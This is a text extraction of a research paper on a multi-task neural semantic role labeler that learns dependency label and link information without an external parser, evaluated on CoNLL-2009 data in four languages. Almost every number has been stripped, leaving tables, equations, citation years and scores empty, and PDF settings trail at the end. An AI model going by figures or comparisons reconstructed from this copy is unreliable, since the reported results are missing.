semantic role labeler. the dependency extractor consists of: • a word representation component (which boils down to a simple embedding look-up); • a k-layer bidirectional lstm (bilstm) encoder that takes as input the repre- sentation of each word in a sentence and produces context-dependent embeddings; • two multilayer perceptron (mlp) networks that predict the dependency label and type of arc between a word and a predicate. the semantic role predictor consists of: • a word representation component that en- capsulates predicate-specific dependency information; • a j-layer bilstm encoder that takes as input the representation of each word in a sentence; • a classifier that takes as input the bilstm representations of predicates and their arguments and assigns semantic roles to the latter. in the following sections we describe these two components more formally. . dependency information extractor the dependency information extractor (bottom block in figure ) operates on sentences after predicate identification (and disambiguation) has taken place. it learns important syntactic information (i.e., the dependency relation between a predicate and its candidate arguments), which is subsequently used by the semantic role labeler. in the description below we assume that predicates are known. sentence encoder we represent words as the concatenation of three vectors: a randomly initial- ized word embedding x′re ∈ rdw , a pre-trained word embedding x′pe ∈ rdw estimated on an exter- nal text collection, and a character embedding xcei learned by convolutional neural network (cnn) with bidirectional lstm (bilstm). the final word representation is given by x = x′re◦x′pe◦x′ce, where ◦ represents the concatenation operator. following marcheggiani et al. ( ), sen- tences are represented using a bi-directional re- current neural network with lstms (hochreiter and schmidhuber, ). a bidirectional lstm receives at time step t a representation x for each word and recursively computes two hidden states, one for the forward pass ( −→ ht ), and another one for the backward pass ( ←− ht ). each word is the concatenation of its forward and backward lstm state vectors ht = −→ ht ◦ ←− ht . dependency label prediction our model focuses on predicting the dependency labels of predicates as opposed to all words in a dependency tree. for each arc (w, p) consisting of predicate p and modifier w, our model assigns the dependency label l with the highest score according to a multilayer perceptron (mlp): label(w, p) = arg max l∈labels mlplbl(hw ◦hp)[l] ( ) where l are pre-defined dependency labels (e.g., subj, obj), and hw and hp are the hidden states of the bidirectional sentence encoder repre- senting word w and predicate p, respectively (see the bottom bilstm in figure ). the inner structure of the mlp is shown in figure . dependency label scores for arc (w, p) are calculated as follows: mlplbl = wlbl tanh(wwhw + wphp) ( ) where ww, wp, and wlbl are parameter matrices. in our experiments we use a two-layered bilstm encoder following kiperwasser and goldberg ( ), who show that placing a dependency classifier on top of two bilstm layers achieves best results for labeled dependency parsing. link type prediction our aim is to capture how semantic predicates are linked to adjacent words in a sentence. specifically, we are interested in predicting whether they are linked, and, if they are, what type of link they have. again, we only downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : model overview: dependency information extractor (bottom) and a semantic role labeler (top). colored lines are syntax-aware representations for the word he and are shared between the two components. figure : dependency label prediction. blue lines denote dependency arcs between words in the sentence and the predicate crowds. focus on syntactic arcs pertaining to the semantic predicate, rather than all arcs in the dependency tree, and assign each word a label representing its link type in relation to the predicate. tag n indicates there is no arc between a word and the figure : predicting the link type of each word in a sentence. blue lines denote dependency arcs between words in the sentence and the predicate crowds. predicate, whereas tags c and p represent child and parent nodes of the predicate, respectively. figure shows an example of how these labels are processed by our model. we extract predicate linking information from dependency downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april tree annotations, and use a mlp predictor to identify link type information for word wt : mlplnk = wlnk tanh(wlht) ( ) a key difference between the dependency label classifier and the link type predictor is that the latter does not explicitly use hp, namely, predicate- specific information. by doing this, we force the model to learn the linking between long-distance word pair. for a sentence with more than one predicates, the dependency information extractor will produce different results for each predicate. . syntax-aware semantic role labeler our semantic role labeler (upper block in figure ) estimates the probability of role r given the hidden states of candidate argument word i and predicate word p: p(r|ti, tp, l) ∝ exp(wl,r(ti ◦ tp)), ( ) where ti and tp are representations for word i and predicate p, respectively, and l is the lemma of predicate p; symbol◦denotes concatenation and∝ signifies proportionality. following marcheggiani and titov ( ), matrix wl,r is the joint embed- ding of role r and the predicate lemma l using a non-linear transformation: wl,r = relu(u(el ◦ er)) ( ) where u is a parameter matrix, and el ∈ rd ′ l and er ∈ rdr are randomly initialized embeddings of predicate lemmas and roles. this way, each role prediction is predicate-specific, and a good representation for roles associated with infrequent predicates can be learned. the model’s training objectivel is the weighted sum of objectives for the srl task and the two auxiliary tasks. formally, l = lsrl + α(llbl + llnk), ( ) where lsrl, llbl, and llnk are the categor- ical cross-entropy of srl, dependency label prediction, and link type prediction, respectively. α is a scalar weight for the auxiliary tasks whose value is tuned experimentally on the development dataset. we will next discuss how the hidden states ti and tp are obtained taking into account the the dependency extractor introduced earlier. input layer representations given a sentence with words (w , . . . , wn), we form a syntax- agnostic word representation x for each word using randomly initialized word embedding xre ∈ rdw , pre-trained word embedding xpe ∈ rdw estimated on an external text collection, randomly initialized part-of-speech tag embedding xpos ∈ rdpos , and randomly initialized lemma embedding xle ∈ rdl (active only if the word is a predicate). the word representation is thus given by x = xre ◦ xpe ◦ xpos ◦ xle, where ◦ represents the concatenation operator. the parameters of the pre-trained word embed- dings xpe are shared with the word embeddings x ′ pe used for our dependency information extrac- tor, and are updated during training. in order to obtain more syntax-aware representations, we utilize hidden-layer representations vhidden and dependency embeddings (elabel and elink). the final representation r, which serves as input to the srl, is the concatenation of three syntactically informed representations: r = x◦vhidden ◦elabel ◦elink ( ) hidden-layer representations in order to com- pute vhidden, we draw inspiration from elmo (peters et al., ), a recently proposed model for generating word representations based on bidirectional lstms trained with a coupled lan- guage model objective. unlike more traditional word embeddings (mikolov et al., ), elmo representations are deep, essentially a linear com- bination of the representations learned at all layers of the lstm instead of just the final layer. we also utilize the combination of the inter- mediate layer representations in the dependency information extractor. given sentence (w , . . . , wn), a bilstm encoder with l layers com- putes for each word a set of l representations: s = {�hj, ←− h j|j = , . . . , l} = {hj|j = , . . . , l} ( ) where hj = [�hj; ←− h j] for each hidden layer in the bilstm encoder. in order to make use of all layers in s for our srl task, we collapse them into a single vector. although we could simply concatenate these representations or select the top layer, we compute downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april vector vhidden as a weighting of the bilstm layers, followed by a non-linear projection: vhidden = relu(whidden(γ j=l∑ j= βjhj)) ( ) where β are softmax-normalized weights for hj , and the scalar parameter γ is of practical importance for optimization, as it allows the model to scale the weighted hidden-layer representations (peters et al., ); both β and γ are updated during training. dependency embeddings an obvious way to take advantage of the dependency label predictions (see section . ) would be to use the embedding el of the label l with the highest score. however, this would place too much emphasis on high confidence labels, which can be noisy. instead, we use the weighted composition of all dependency label embeddings elabel, which is calculated as: elabel = ∑ l∈labels softmax(mlplbl)[l]∗el ( ) where the weight of each label embedding is the normalized probability given by the label classifier. analogously, we represent dependency link information elink as: elink = ∑ l∈{n,c,p} softmax(mlplnk)[l]∗el ( ) experiments we implemented our model in pytorch and evaluated it on the english, chinese, german, and spanish conll- benchmark datasets following the standard training, testing, and development set splits. the datasets contain gold- standard dependency annotations, and also gold lemmas, part-of-speech tags, and morphological features. data for the different languages was generated by merging various language specific treebanks such as the penn treebank (parcus et al., ) and brown corpus (francis and kucera, ) for english, the prague dependency treebank for czech (hajičová et al., ), the chinese treebank (xue et al., ), and proposition bank (xue and palmer, ) for chinese, and so on (we refer the interested reader our code is available at https://github.com/ ruicainlp/srl_dep. hyperparameter value dw (english word embeddings) dw (other languages word embeddings) dc (character embeddings) dpos (pos embeddings) dl (lemma embeddings) dh (lstm hidden states) dhidden (hidden layer representation) doutput (output label embeddings) dr (role representation) d ′ l (output lemma representation) k (bilstm depth) j (bilstm depth) batch size input layer dropout rate . hidden layer dropout rate . learning rate . auxiliary tasks loss weight α . table : hyperparameter values. to hajic et al. [ ] for details on individual languages and their annotations). for experiments on english, we used the embeddings of dyer et al. ( ), which were learned using the structured skip n-gram approach of ling et al. ( ). in a few experiments we also used english character embeddings following he et al. ( ). these were pre-trained with a cnn-bilstm model (peters et al., ) on the billion word benchmark, which is publicly released as part of the allennlp toolkit. embeddings for chinese, spanish, and german were pre-trained on wikipedia using fasttext (bojanowski et al., ). the dropout mechanism was applied to the input layer and the top hidden layer of the bilstm encoders. we used the adam optimizer (kingma and ba, ) to train our models. we performed hyperparameter tuning and model selection on the english development set; optimal hyperparameter values (for all languages) are shown in table . the bilstm for the dependency extractor had two layers, and the bilstm for the semantic role labeler had four. predicted pos tags were provided by the conll- shared-task organizers. for all lan- guage, we used the same predicate disambiguator http://www.statmt.org/lm-benchmark/ https://allennlp.org/elmo publicly available at https://github.com/ facebookresearch/fasttext downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/ruicainlp/srl_dep https://github.com/ruicainlp/srl_dep http://www.statmt.org/lm-benchmark/ https://allennlp.org/elmo https://github.com/facebookresearch/fasttext https://github.com/facebookresearch/fasttext single models (with external parser) p r f björkelund et al. ( ) . . . lei et al. ( ) - - . fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . he et al. ( ) . . . single models (w/o external parser) p r f marcheggiani et al. ( ) . . . he et al. ( ) . . . ours (w/o elmo) . . . ours (with elmo) . . . ensemble models p r f fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . table : english results on the conll- in-domain (wsj) test set. as in roth and lapata ( ) which uses a pipeline of mate-tools (björkelund et al., ). . results our results on the english (in-domain) test set are summarized in table . we compared our system against previous models that use a dependency parser (first block in the table) and those that do not (second block). we also report the results of various ensemble srl models (third block). for a fair comparison with he et al. ( ), we present a variant of our model with character- based elmo embeddings. most comparisons involve neural systems that are based on bilstms (marcheggiani et al., ; marcheggiani and titov, ; he et al., ) or use neural networks for learning slr-specific embeddings (fitzgerald et al., ; roth and lapata, ). we also report the results of two strong symbolic models based on tensor factorization (lei et al., ) and a pipeline of modules that carry out the tokenization, lemmatization, part-of-speech tagging, dependency parsing, and semantic role labeling (björkelund et al., ). as can be seen in table , our model outper- forms previous single and ensemble models, irre- spective of whether they make use of a dependency parser or not. when taking into account elmo embeddings, our model achieves . % f , which single models (with external parser) p r f björkelund et al. ( ) . . . lei et al. ( ) - - . fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . he et al. ( ) . . . single models (w/o external parser) p r f marcheggiani et al. ( ) . . . he et al. ( ) . . . ours (w/o elmo) . . . ours (with elmo) . . . ensemble models p r f fitzgerald et al. ( ) - - . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . table : english results on the conll- out-of domain (brown) test set. is an absolute improvement of . percentage point over the state of the art (he et al., ). it is also interesting to note that the performance of he et al. ( ) drops from . % to . % when a depen- dency parser is not available, whereas our model is able to extract dependency information on its own, without relying on external syntactic parsers. results on the out-of-domain english test set are presented in table . we include comparisons with the same models as in the in-domain case. again, our syntax-light model outperforms previ- ously published single and ensemble models, even when elmo character embeddings are not taken into account (f increases from . % to . % with elmo). it is perhaps not surprising that our model outperforms by a wide margin semantic role labelers that rely heavily on syntactic parsers (roth and lapata, ; marcheggiani and titov, ). their performance degrades considerably on out-of-domain data and the syntactic trees they produce are noisy, compromising the accuracy of the srl systems that rely on them. our model only makes use of features extracted from hidden layers and the weighted sum of output embed- dings, rather than the output of any parser, and as a result is less brittle in this setting. in table we report results from additional experiments on chinese, german, and spanish. although we have not performed detailed downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april chinese p r f björkelund et al. ( ) . . . roth and lapata ( ) . . . marcheggiani and titov ( ) . . . he et al. ( ) . . . ours . . . german p r f björkelund et al. ( ) . . . roth and lapata ( ) . . . ours . . . spanish p r f björkelund et al. ( ) . . . roth and lapata ( ) . . . marcheggiani et al. ( ) . . . ours . . . table : results on the conll- test sets for chinese, german, and spanish. parameter selection in these languages (i.e., we used the same parameters as in english), our model achieves state-of-the-art performance across lan- guages. note that elmo character embeddings are not available in chinese and as a result differ- ences in performance between our model and he et al. ( ) are more noticeable compared with english (our system outperforms theirs by . percentage point f ). for german and spanish, our model also achieves the best overall f -scores of . % and . %, respectively. . ablation studies and analysis in order to evaluate the contribution of various model components, we performed a series of ablation studies on the english development set without predicate disambiguation. we performed ablation studies without elmo embeddings, as they could introduce external syntactic and semantic information, potentially obscuring any conclusions about the behavior of our own model. our ablation experiments are summarized in table . the first block shows the performance of the full model. in the second block, we focus on the effect of different kinds of syntactic represen- tations. first, we examined whether it is advan- tageous to share word embeddings between the semantic role labeler and the dependency extrac- tor. we observed that a version of the model that updates pre-trained word embeddings separately performs slightly worse. second, we observe a . % drop in f when not using the representations system p r f ours . . . w/o sharing word embeddings . . . w/o hidden-layer representation . . . w/o output embeddings . . . w/o multi-task learning . . . with full parser . . . w/o joint training . . . table : ablation results on the conll- english development set. of the hidden states in the dependency extractor. the result indicates that features captured by hid- den layers for the dependency prediction task are also helpful in semantic role labeling. third, we see that not directly using the results of the depen- dency extractor slightly hurts srl performance (we observe a . percentage point drop in f ). this is not surprising as the semantic role labeler and dependency information extractor are trained simultaneously. at the beginning of the training process the performance of the extractor is low, so the semantic role labeler gradually learns how to utilize noisy label embeddings, instead of rely- ing on the accuracy of extractor. this makes our model more robust in situations where the depen- dency extractor cannot achieve high performance, and also explains why our model performs better on the out-of-domain test set compared with other systems relying on parsers. in the third block of table , we first verify whether multi-task learning is critical to our srl task by removing the term (llbl + llnk) from the training objective (see equation ( )) and observe a . percentage point drop in f . in figure we compare the full model with multi- task learning against a model trained only for semantic role labeling (srl only) in more detail. we group the semantic roles assigned by the two models (our full model vs. srl only) by their dependency labels. as can be seen, the full model outperforms srl-only on most dependency labels except oprd and tmp, which account only for % of semantic roles. we observe noticeable gains for semantic roles with dependency labels nmod, obj, sbj, and adv, which appear relatively frequently in the development set. in table , we present model performance for verbal and nominal predicates, and again compare the results of the full downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : semantic role labeling performance on the english conll- development set; roles are grouped into corresponding dependency relations whose proportional frequencies shown in parentheses (x-axis). verbal ours srl only frequency(%) a . . % a . . % a . . % am-* . . % all . . % nominal ours srl only frequency(%) a . . % a . . % a . . % am-* . . % all . . % table : f results on the english test set broken down into verbal and nominal predicates. model against an srl only model. both models are worse at predicting the semantic roles of nominal predicates (compared with verbal ones). however, our model is generally more accurate, especially for nominal predicates, bringing an overall improvement of . percentage point in f . we next substituted the dependency extractor with a full parser, specifically, the graph-based neural model of kiperwasser and goldberg ( ). the parser, enhanced model achieves a performance of . % in f , which is quite close to the model relying on the dependency extractor (see row ‘‘with full parser’’ in table ). this indicates that we are able to capture most of the information contained in a syntactic parser without any overhead incurred by full-blown parsing. we observed that using a full parser leads to a . per- centage point f increase in recall, but at the expense of precision which drops by . percent- age point. as shown in figure , approximately % of the arguments in the english development set are not directly linked to the predicate (see no arc bar). long-range dependencies often pose problems for srl models; in fact, special net- works like gcn (marcheggiani and titov, ) and pathlstm (roth and lapata, ) have been proposed to explicitly percolate information from each word in the sentence to its syntactic neighbors. however, pathlstm performs worse than a vanilla bilstm model in the case of long- distance arguments, and the performance of an srl model augmented with gcn also decreases when more than one gcn layer is stacked. one of the disadvantages of using an external parser are errors that then propagate through paths in the tree. in our model, a word’s dependency information solely relates to the predicate under consider- ation, which renders the semantic role labeler aware of the overall dependency structure of the input sentence without, however, propagating errors to other words. although the dependency information extractor is trained to recognize arcs pertaining to the predicate, its hidden layers still capture syntactic features for long-distance argu- ments and share them with the semantic role labeler. as shown in the first bar of figure , arguments not directly linked to the predicate are identified more accurately with the full model (f improves by approximately percentage point). finally, instead of building a dependency information extractor, we simply took the one-best outputs of the trained full parser and directly used them as word representations (i.e., replacing the elink and elabel). this means that the full parser is pre-trained and its parameters will not be updated during the training process for srl. we see (row ‘‘w/o joint training’’ in table ) that compared with the model using a full parser, removing joint training further hurts srl performance ( . percentage point drop in f ). . dependency annotations although our model does not rely on an exter- nal parser for providing information pertaining to dependency relations, it nevertheless requires gold standard dependency annotations for training the dependency extractor component (i.e., depen- dency label and link prediction). as manual anno- tations are expensive and not always available, we also examined whether it is possible to obtain competitive performance with fewer annotations. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : srl performance on the english conll- development set when different proportions of dependency annotations are used for training. figure shows how f varies when the full model is trained on increasing amounts of depen- dency annotations. like our previous ablation studies, we do not perform predicate disambigua- tion and do not use character embeddings in these experiments. we randomly choose a subset of training samples ( %, % etc.) with depen- dency annotations, and if the input sample is in the subset, we update model parameters during training according to the combined loss of the srl and auxiliary tasks, otherwise parameters are updated for the srl task only. it is obvious from figure that the performance of our model increases gradually with more annotations. interestingly, we observe a large jump in performance with only % of the available dependency annotations (f improves from . % to %). the model’s performance becomes competitive when % of the annotations are used, and remains stable when more annotations are provided. in general, these results suggest that our model can also work effectively when a small number of gold dependency labels are given as a supervision signal to the dependency information extractor. related work our model resonates with the recent trend of developing neural network models for semantic role labeling. it also agrees with previous work in devising ways to better take advantage of syntactic information for the srl task within a relatively simple modeling framework based on bi-directional lstms (marcheggiani et al., ). previous proposals for incorporating syn- tactic information include the use of low-rank tensor factorizations (lei et al., ), convolu- tional and time-domain neural networks (foland and martin, ), jointly embedded arguments and semantic roles in a shared vector space (fitzgerald et al., ), learning representations of shortest dependency paths between a predicate and its potential arguments (roth and lapata, ), encoding sentences with graph convolu- tional networks (marcheggiani and titov, ), constrained decoding (he et al., ), and argu- ment pruning (he et al., ). in contrast to these approaches, we do not use an external dependency parser but rather incorporate syntactic informa- tion as part of the model’s learning objective. aside from assigning semantic roles, our model performs two auxiliary tasks (dependency and link type prediction), thereby learning syntactic information specific to the srl task. multi-task learning (mtl; caruana, ) has been a popular approach for various nlp tasks, starting with collobert et al. ( a) who propose a multi-task model for pos-tagging, chunking, named entity recognition, and srl. søgaard and goldberg ( ) train a multi-task model for pos-tagging, syntactic chunking, and combinatory categorical grammar supertagging, while hashimoto et al. ( ) introduce a joint many-task model together with a strategy for suc- cessively growing its depth to solve increasingly complex tasks. zhang and weiss ( ) propose stack-propagation using a continuous and differ- entiable link between pos tagging and depen- dency parsing, in which pos tags are utilized as a regularizer of learned representations for parsing. mtl has also been applied to semantic depen- dency parsing (peng et al., ; swayamdipta et al., ) and semantic role labeling. strubell et al. ( ) present an end-to-end srl model that is trained to jointly predict parts of speech and predicates, perform parsing, and attend to syntactic parse parents, while assigning semantic role labels. most recent mtl models (bingel and søgaard, ; hashimoto et al., ) use different layers for multiple tasks with different datasets, separately optimizing each task at each epoch. in our case, the srl task and the two auxiliary tasks share the same input, and as a result optimization for all three tasks takes place simultaneously which is more efficient. also, in terms of model architecture, information from the auxiliary tasks is not incorporated by simply stacking layers on top of each other but rather is explored more directly by serving as input to the srl model downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april itself. like strubell et al. ( ), we resort to multi-task learning in order to make use of lin- guistic information for semantic role labeling as effectively as possible. our model is simpler in eschewing the training of a parser; it also does not predict part of speech tags or predicates, although such auxiliary tasks could be incorporated in the future. we introduce novel auxiliary tasks such as predicting the dependency label of a word and whether there exists an arc linking it to the predicate and show that they improve srl performance for english and other languages. conclusions in this paper, we proposed a multi-task model that learns dependency aware representations for semantic role labeling without using any external parser. experimental results across languages have shown improvements over competitive baselines and state-of-the-art systems. through several ablation studies we have also confirmed that hidden-layer representations, pre-trained word embeddings, and label embeddings all contribute in improving the performance of our srl model. although the dependency extractor takes a rather local view of the sentence, concentrating on the predicate and closely related neighbors, more global syntactic information is neverthe- less implicitly captured. even when dependency annotations are sparse, our model is able to encap- sulate syntactic information and improve upon a syntax agnostic variant. directions for future work are many and varied. we would like to improve our multi-task model by determining the value of α (i.e., the loss weight for the two auxiliary tasks) dynamically. this would allow us to optimize performance for the main and auxiliary tasks at the same time. our experiments in this work have focused exclusively on dependency-based formalisms for representing semantic predicate-argument structures (as oper- ationalized in the conll- shared task). an interesting question is whether our model would work equally well for semantic role representa- tions based on constituents (i.e., phrases or spans) such as those annotated in the conll- shared task (carreras and màrquez, ) or ontonotes (pradhan et al., ). addressing this question would also allow direct comparisons with recently proposed span-based models (he et al., ; strubell et al., ). finally, a more ambitious goal would be to learn a semantic role labeler in a weakly supervised setting where only annotations for dependency labels are available. acknowledgments we thank the anonymous reviewers for their feed- back and the action editor alessandro moschitti for his comments. we gratefully acknowledge the support of the european research council (award number , ‘‘translating multiple modalities into text’’). references wilker aziz, miguel rios, and lucia specia. . shallow semantic trees for smt. in proceedings of the sixth workshop on sta- tistical machine translation, pages – . edinburgh. dzmitry bahdanau, kyunghyun cho, and yoshua bengio. . neural machine translation by jointly learning to align and translate. in proceedings of the rd international confer- ence on learning representations. san diego, ca. joachim bingel and anders søgaard. . iden- tifying beneficial task relations for multi-task learning in deep neural networks. in proceed- ings of the th conference of the european chapter of the association for computa- tional linguistics: volume , short papers, pages – . johannes bjerva, barbara plank, and johan bos. . semantic tagging with deep residual networks. in proceedings of coling , the th international conference on com- putational linguistics: technical papers, pages – . osaka. anders björkelund, bernd bohnet, love hafdell, and pierre nugues. . a high-performance syntactic and semantic dependency parser. in proceedings of the rd international con- ference on computational linguistics: demon- strations, pages – . piotr bojanowski, edouard grave, armand joulin, and tomas mikolov. . enriching word vec- tors with subword information. transactions of downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the association for computational linguistics, : – . xavier carreras and lluı́s màrquez. . intro- duction to the conll- shared task: se- mantic role labeling. in proceedings of the ninth conference on computational nat- ural language learning (conll- ), pages – . ann arbor, mi. richard caruana. . multitask learning: a knowledge-based source of inductive bias. in proceedings of the th international con- ference on machine learning, pages – . hao cheng, hao fang, and mari ostendorf. . open-domain name error detection using a multi-task rnn. in proceedings of the conference on empirical methods in natural language processing, pages – . lisbon. janara christensen, mausam, stephen soderland, and oren etzioni. . an analysis of open information extraction based on semantic role labeling. in proceedings of the th inter- national conference on konwledge capture, pages – . banff. ronan collobert, jason weston, léon bottou, michael karlen, koray kavukcuoglu, and pavel kuksa. a. natural language processing (almost) from scratch. journal of machine learning research, (aug): – . ronan collobert, jason weston, michael karlen, léon bottou, koray kavukcuoglu, and pavel kuksa. b. natural language process- ing (almost) from scratch. journal of machine learning research, (aug): – . timothy dozat and christopher d. manning. . deep biaffine attention for neural depend- ency parsing. corr, abs/ . . david k duvenaud, dougal maclaurin, jorge iparraguirre, rafael bombarell, timothy hirzel, alan aspuru-guzik, and ryan p. adams. . convolutional networks on graphs for learning molecular fingerprints. in advances in neural information processing systems , pages – . chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition-based dependency parsing with stack long short-term memory. in proceedings of the rd annual meeting of the association for computational linguistics and the th inter- national joint conference on natural lan- guage processing (volume : long papers), pages – . nicholas fitzgerald, oscar täckström, kuzman ganchev, and dipanjan das. . semantic role labeling with neural network factors. in proceedings of the conference on empirical methods in natural language processing, pages – . lisbon. william foland and james martin. . dependency-based semantic role labeling using convolutional neural networks. in proceedings of the fourth joint conference on lexical and computational semantics, pages – . nelson francis and henry kucera. , brown corpus manual. technical report, department of linguistics, brown unviersity, providence, ri. jan hajič, massimiliano ciaramita, richard johansson, daisuke kawahara, maria antònia martı́, lluı́s màrquez, adam meyers, joakim nivre, sebastian padó, jan štěpánek, pavel straňák, mihai surdeanu, nianwen xue, and yi zhang. . the conll- shared task: syntactic and semantic dependencies in multiple languages. in proceedings of the thirteenth conference on computational nat- ural language learning (conll ): shared task, pages – . boulder, co. eva hajičová, zdeněk kirschner, and petr sgall. . a manual for analytic layer annotation of the prague dependency treebank (english translation), úfal mff uk, prague, czech republic. kazuma hashimoto, caiming xiong, yoshimasa tsuruoka, and richard socher. . a joint many-task model: growing a neural network for multiple nlp tasks. in proceedings of the conference on empirical methods in natural language processing, pages – . luheng he, kenton lee, mike lewis, and luke zettlemoyer. . deep semantic role label- ing: what works and what’s next. in pro- ceedings of the th annual meeting of the association for computational linguistics downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april (volume : long papers), pages – . vancouver. shexia he, zuchao li, hai zhao, and hongxiao bai. . syntax for semantic role labeling, to be, or not to be. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, : – . richard johansson and pierre nugues. . the effect of syntactic representation on semantic role labeling. in proceedings of the nd international conference on computational linguistics, pages – . manchester. steven kearnes, kevin mccloskey, marc berndl, vijay pande, and patrick riley. . mo- lecular graph convolutions: moving beyond fingerprints. journal of computer-aided mo- lecular design, ( ): – . atif khan, naomie salim, and yogan jaya kumar. . a framework for multi-document ab- stractive summarization based on semantic role labelling. applied soft computing, : – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. arxiv preprint, arxiv: . . eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing using bidirectional lstm feature representations. transactions of the association for compu- tational linguistics, : – . thomas n. kipf and max welling. . semi- supervised classification with graph convolu- tional networks. in proceedings of the th international conference on learning repre- sentations. toulon. joel lang and mirella lapata. . unsupervised induction of semantic roles. in human lan- guage technologies: the annual con- ference of the north american chapter of the association for computational linguistics, pages – . tao lei, yuan zhang, lluı́s màrquez, alessandro moschitti, and regina barzilay. . high-order low-rank tensors for se- mantic role labeling. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . denver, co. wang ling, chris dyer, alan w black, and isabel trancoso. . two/too simple adaptations of word vec for syntax problems. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – , denver, co. minh-thang luong, quoc v. le, ilya sutskever, oriol vinyals, and lukasz kaiser. . multi-task sequence to sequence learning. in proceedings of the international conference on learning representations. san juan, pr. diego marcheggiani, joost bastings, and ivan titov. . exploiting semantics in neural machine translation with graph convolutional networks. in proceedings of the the th annual conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt ). new orleans, la. diego marcheggiani, anton frolov, and ivan titov. . a simple and accurate syntax- agnostic neural model for dependency-based semantic role labeling. in proceedings of the st conference on computational natural lan- guage learning (conll ), pages – . vancouver. diego marcheggiani and ivan titov. . encoding sentences with graph convolutional networks for semantic role labeling. in proceed- ings of the conference on empirical methods in natural language processing, pages – . copenhagen. tomas mikolov, ilya sutskever, kai chen, greg s. corrado, and jeff dean. , distributed representations of words and phrases and their compositionality. in advances in neural information processing systems , pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april marth palmer, daniel gildea, and paul kingsbury. . the proposition bank: an annotated corpus of semantic roles. computational linguistics, ( ): – . mitchell p. parcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated corpus of english: the penn treebank. computational linguistics, ( ): – . hao peng, sam thomson, and noah a. smith. . deep multitask learning for semantic dependency parsing. in proceedings of the th annual meeting of the association for computational linguistics (volume : long papers), pages – . matthew peters, mark neumann, mohit iyyer, matt gardner, christopher clark, kenton lee, and luke zettlemoyer. . deep con- textualized word representations. in pro- ceedings of the conference of the north american chapter of the association for computational linguistics: human lan- guage technologies, volume (long papers), pages – . barbara plank. . keystroke dynamics as signal for shallow syntactic parsing. in proceedings of the th international conference on computational linguistics: technical papers, pages – . osaka. sameer pradhan, alessandro moschitti, nianwen xue, hwee tou ng, anders björkelund, olga uryupina, yuchen zhang, and zhi zhong. . towards robust linguistic anal- ysis using ontonotes. in proceedings of the seventeenth conference on computational natural language learning, pages – . sofia. michael roth and mirella lapata. . neural semantic role labeling with dependency path embeddings. in proceedings of the th annual meeting of the association for com- putational linguistics (volume : long papers), pages – . berlin. anders søgaard and yoav goldberg. . deep multi-task learning with low level tasks supervised at lower layers. in proceedings of the th annual meeting of the association for computational linguistics (volume : short papers), pages – . berlin. emma strubell, patrick verga, daniel andor, david weiss, and andrew mccallum. . linguistically-informed self-attention for se- mantic role labeling. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . mihai surdeanu, richard johansson, adam meyers, lluı́s màrquez, and joakim nivre. . the conll shared task on joint parsing of syntactic and semantic dependencies. in conll : proceedings of the th con- ference on computational natural language learning, pages – . swabha swayamdipta, sam thomson, chris dyer, and noah a smith. . frame-semantic par- sing with softmax-margin segmental rnns and a syntactic scaffold. arxiv preprint, arxiv: . . oriol vinyals, lukasz kaiser, terry koo, slav petrov, ilya sutskever, and geoffrey hinton. . grammar as a foreign language. in proceedings of the th international con- ference on neural information processing systems, pages – . montreal. nanwen xue, fei xia, fu dong chiou, and martha palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural language engineering, ( ): – . nianwen xue and martha palmer. . adding semantic roles to the chinese treebank. natural language engineering, ( ): – . yuan zhang and david weiss. . stack- propagation: improved representation learning for syntax. in proceedings of the th an- nual meeting of the association for compu- tational linguistics (volume : long papers), pages – . jie zhou and wei xu. . end-to-end learning of semantic role labeling using recurrent neural networks. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long papers), pages – . beijing. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april introduction model description dependency information extractor syntax-aware semantic role labeler experiments results ablation studies and analysis dependency annotations related work conclusions << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /all /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /tags /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true 